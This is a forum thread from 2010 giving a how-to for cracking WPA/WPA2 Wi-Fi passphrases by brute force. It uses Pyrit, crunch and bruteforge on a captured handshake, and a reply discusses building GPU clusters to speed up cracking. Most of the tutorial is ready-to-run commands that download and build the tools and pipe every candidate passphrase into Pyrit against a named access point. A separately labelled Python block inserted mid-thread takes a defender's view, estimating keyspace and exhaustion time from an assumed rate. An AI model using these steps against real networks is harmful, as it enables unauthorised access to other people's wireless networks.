Post subject: Brute Force WPA/WPA2 in Ubuntu 9.10
Posted: 31 Jan 2010, 20:45
Joined: 11 Nov 2008, 12:30
Posts: 184
Location: NYC
So what are you going to do if your word list does not have the password?
Here is a how-to for cracking WPA/WPA2 by brute forcing on the fly.

First of all, make sure you have your WPA handshake that you have acquired from the AP by using the aircrack-ng suite.

We will be using Pyrit (http://code.google.com/p/pyrit/) for most of our work here.
Pyrit allows you to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time tradeoff. It has CUDA and OpenCL support, so we can use our more powerful and cheaper GPUs, which are at most 100 times faster than the CPU.

Let's install the needed packages first:
Code:
sudo apt-get install subversion python-dev libssl-dev zlib1g-dev

Now let's compile the latest SVN of Pyrit:
Code:
sudo svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only/pyrit
sudo python setup.py build
sudo python setup.py install

If you have an NVIDIA or ATI GPU, make sure you compile the extension modules as well.

A good thing to do first is strip all the unnecessary packets that are in the .cap file;
this would make the cracking much faster if the original .cap file was large.
Code:
pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_dump_MyNetwork.cap strip


Now we compile a program called crunch:
Code:
wget http://www.darkc0de.com/c0de/c/crunch.txt -O crunch.c
gcc -c crunch.c
gcc -o crunch crunch.o -lm

crunch will output to stdout, so you can pipe the results into pyrit.

Now we are all ready to do some cracking, so make sure you run these next examples from the place you compiled crunch!
Examples:
Code:
./crunch 8 8 0123456789 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This would generate every numeric combination using numbers 0-9 with a length of 8.

Code:
./crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters.

Let's say you know the password is admin and 3 unknown numbers, so here is what you do:
Code:
./crunch 8 8 0123456789 -t admin@@@ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

So only those @'s will change with every number combo.

Here is an example to use all from length 8 to 63 (lol):
Code:
./crunch 8 63 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough


Too bad crunch lacks the special characters (?!"#$%&'()*+,-./:;<=>?[\]^_`{|}~)
There is another alternative program called bruteforge: http://masterzorag.blogspot.com/
This program has more options, but bruteforge does NOT compute all char combinations; it skips ahead when a condition is verified.
Get:
Code:
wget http://mz03.netfirms.com/py/bruteforge -O bruteforge.py


Examples:
Code:
python bruteforge.py bruteforge -c 2 -a 00000000 -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This will generate a numeric string from len 8 to 9.

Code:
python bruteforge.py bruteforge -a aaaaaaaa -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters.

Notes: You can compute with all characters by using the -c 6 function with bruteforge. Also, you can use import_passwords instead of attack_passthrough for inserting generated strings into a database you have created with pyrit.
Example:
Code:
python bruteforge.py bruteforge -a aaaaaaaa | pyrit  -i - import_passwords


Conclusion:
Well, you can compute every possible combination, but it will just take time. This tutorial is just a demo; don't try this at home unless you have the performance of a petaflop.
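
Added example, not part of the original post: the closing point above, that exhaustive search is only a matter of time, can be quantified from the defender's side when choosing a passphrase policy. The Python below counts the candidates in each crunch invocation shown in the post and estimates worst-case exhaustion time; ASSUMED_RATE is a hypothetical figure (not a Pyrit benchmark) and all function names are illustrative.

```python
# Added example: size of the post's candidate sets and time to exhaust them.
SECONDS_PER_YEAR = 365 * 24 * 3600
ASSUMED_RATE = 100_000  # assumed passphrase checks per second, not measured

DIGITS = "0123456789"
LOWER = "abcdefghijklmnopqrstuvwxyz"
ALNUM = DIGITS + LOWER + LOWER.upper()


def keyspace(min_len, max_len, charset, template=None):
    """Count candidates for a length range, or for a template in which
    each '@' is a free position and every other character is fixed."""
    if not 8 <= min_len <= max_len <= 63:
        raise ValueError("WPA/WPA2 passphrases are 8 to 63 characters")
    n = len(set(charset))
    if template is not None:
        if not min_len <= len(template) <= max_len:
            raise ValueError("template length outside the requested range")
        return n ** template.count("@")
    return sum(n ** length for length in range(min_len, max_len + 1))


def years_to_exhaust(candidates, rate=ASSUMED_RATE):
    """Worst-case years to test every candidate at a constant rate."""
    return candidates / rate / SECONDS_PER_YEAR


def min_length_for(charset_size, target_years, rate=ASSUMED_RATE):
    """Shortest random passphrase length (8..63) whose keyspace takes at
    least target_years to exhaust; exponentiation stays in integers."""
    needed = target_years * SECONDS_PER_YEAR * rate
    length = 8
    while length < 63 and charset_size ** length < needed:
        length += 1
    return length


if __name__ == "__main__":
    cases = {
        "8 digits": keyspace(8, 8, DIGITS),
        "8 lowercase letters": keyspace(8, 8, LOWER),
        "admin@@@ with digits": keyspace(8, 8, DIGITS, "admin@@@"),
        "8 to 63 alphanumeric": keyspace(8, 63, ALNUM),
    }
    for name, count in cases.items():
        print(f"{name}: {count:.3e} candidates, "
              f"{years_to_exhaust(count):.3e} years at the assumed rate")
    print("length for 100 years, digits only:", min_length_for(10, 100))
    print("length for 100 years, alphanumeric:", min_length_for(62, 100))
```

At the assumed rate, an 8-digit passphrase falls in well under a day, while a random alphanumeric one needs only 9 characters to push the worst case past a century.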


Post subject: Re: Brute Force WPA/WPA2 in Ubuntu 9.10
Posted: 01 Feb 2010, 10:11
some features that should be implemented:
get these generating tools to support CUDA or OpenCL so we can actually speed up the performance if we have a large cluster of super computers, this way we will be able to pipe enough data under linux
since linux is faster and better than windows

a new gpu from Nvidia should be released shortly so it should have high performance
(gt 300 core)
then we can simply use motherboards such as
http://www.evga.com/products/moreInfo.a ... otherboard
to build cheap high performance clusters which will have 4 gpus per cluster

now all we have to find is which gpu is faster and cheaper for brute forcing; ATI or Nvidia?

